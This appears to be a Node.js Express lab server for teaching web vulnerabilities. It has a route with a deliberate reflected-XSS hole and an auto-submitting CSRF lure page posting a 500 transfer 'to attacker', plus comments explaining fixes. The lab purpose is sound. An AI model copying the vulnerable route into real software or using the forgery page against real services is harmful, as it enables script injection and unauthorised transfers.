// Lab server for demonstrating web vulnerabilities. The routes registered on
// `app` in this file include a reflected-XSS page ('/') and a page ('/csrf')
// that auto-submits a cross-origin POST to http://localhost:3000/transfer.
// NOTE(review): the routes are unsafe on purpose; do not reuse them in a real application.
const express = require("express");
const app = express();
const path = require('path');
app.get('/', (req, res) => {
    // Deliberately vulnerable: demonstrates reflected XSS.
    // The `name` query parameter (default "guest") is interpolated, unescaped,
    // into a JavaScript string literal inside an inline script element.
    // Because the sink is a script context, HTML-escaping alone is not a
    // sufficient fix. A safe version would not build script source from
    // request data at all: serve static markup, set the value on the client
    // via textContent, and add a restrictive Content-Security-Policy as
    // defence in depth.
    // NOTE(review): depending on the query parser, req.query.name may be an
    // array or object rather than a string; confirm before relying on its type.
    const visitor = req.query.name || "guest";
    const body = `<script>alert("Hello, ${visitor}")</script>`;
    res.send(body);
});
app.get('/b.html', (req, res) => {
  // Serves the index.html that sits next to this script. The path is fixed and
  // built from __dirname, so no request data influences which file is read.
  const pagePath = path.join(__dirname, 'index.html');
  res.sendFile(pagePath);
});


app.get('/csrf', (req, res) => {
    // Lab page demonstrating cross-site request forgery (CSRF).
    // The response holds a form whose hidden fields (to=attacker, amount=500)
    // are POSTed to http://localhost:3000/transfer, and an inline script
    // submits that form as soon as the page loads. The visible text reads
    // "Free prize draw!" and "Click to claim your reward!".
    //
    // Defender notes: the target endpoint should require an unpredictable
    // per-session CSRF token on state-changing requests and/or verify the
    // Origin header. If the target authenticates by cookie, SameSite alone
    // does not help in this lab layout: localhost:4000 and localhost:3000
    // differ only by port, and ports are not part of the "site", so the
    // request counts as same-site.
    const lurePage = `
      <h1>免费抽奖！</h1>
      <form action="http://localhost:3000/transfer" method="POST">
        <input type="hidden" name="to" value="attacker" />
        <input type="hidden" name="amount" value="500" />
        <input type="submit" value="点我领取奖励！" />
      </form>
      <script>
        document.forms[0].submit();
      </script>
    `;
    res.send(lurePage);
});

// Start the lab server on port 4000 and print its local URL once it is listening.
// NOTE(review): no host argument is passed, so the server accepts connections
// on all interfaces, not just loopback. For an intentionally vulnerable demo,
// consider binding to a loopback address so other machines on the network
// cannot reach it.
const onListening = () => {
  console.log("http://localhost:4000");
};
app.listen(4000, onListening);